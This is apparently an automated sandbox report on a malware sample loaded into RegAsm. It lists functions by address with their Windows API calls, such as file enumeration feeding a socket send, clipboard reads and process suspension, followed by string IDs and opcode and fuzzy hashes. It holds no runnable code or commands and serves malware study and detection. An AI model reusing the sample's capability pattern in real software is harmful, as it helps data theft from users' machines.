                                                                        • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                        Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileFind$FirstNextsend
                                                                        • String ID: XPG$XPG
                                                                        • API String ID: 4113138495-1962359302
                                                                        • Opcode ID: f5f6ad7c1e663cc93207a7cd22a0ce1f29ec8503eb9be1c9e7cd2c1c921ea284
                                                                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                                        • Opcode Fuzzy Hash: f5f6ad7c1e663cc93207a7cd22a0ce1f29ec8503eb9be1c9e7cd2c1c921ea284
                                                                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                        Function 00451CD8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                        • String ID: sJD
                                                                        • API String ID: 1661935332-3536923933
                                                                        • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                        • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                                        • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                        • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                                        Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorInfoLastLocale$_free$_abort
                                                                        • String ID:
                                                                        • API String ID: 2829624132-0
                                                                        • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                        • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                                        • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                        • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                                        Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                        Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                        • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                        • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                        • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                        Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$CloseDataOpen
                                                                        • String ID:
                                                                        • API String ID: 2058664381-0
                                                                        • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                        • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                        • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                        • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                        Function 0041BB09 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                                                        • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041BB2A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseHandleOpenSuspend
                                                                        • String ID:
                                                                        • API String ID: 1999457699-0
                                                                        • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                                        • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                                                        • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                                        • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                                                        Function 0041BB35 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                                                        • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041BB56
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CloseHandleOpenResume
                                                                        • String ID:
                                                                        • API String ID: 3614150671-0
                                                                        • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                                        • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                                                        • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                                        • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
                                                                        Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434C6B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID: MZ@
                                                                        • API String ID: 2325560087-2978689999
                                                                        • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                        • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                                        • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                                        • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                                        Function 0044E879 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .
                                                                        • API String ID: 0-248832578
                                                                        • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                                        • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                                        • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                                        • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                                        Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.621174878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 0000000E.00000002.621168505.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.621174878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .
                                                                        • API String ID: 0-248832578
                                                                        • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                        • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                        • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                        • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                        Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                        • String ID: lJD
                                                                        • API String ID: 1084509184-3316369744
                                                                        • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                        • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                                        • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                                        • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                                        Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                        • String ID: lJD
                                                                        • API String ID: 1084509184-3316369744
                                                                        • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                        • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                                        • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                                        • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                                        Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: GetLocaleInfoEx
                                                                        • API String ID: 2299586839-2904428671
                                                                        • Opcode ID: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                                        • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                                        • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                                        • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                                        Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                                                        • String ID:
                                                                        • API String ID: 1663032902-0
                                                                        • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                        • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                                        • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                        • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                                        Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale_abort_free
                                                                        • String ID:
                                                                        • API String ID: 2692324296-0
                                                                        • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                        • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                                        • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                        • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                                        Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                                        • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                        • String ID:
                                                                        • API String ID: 1272433827-0
                                                                        • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                        • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                                        • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                        • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                                        Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                        • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
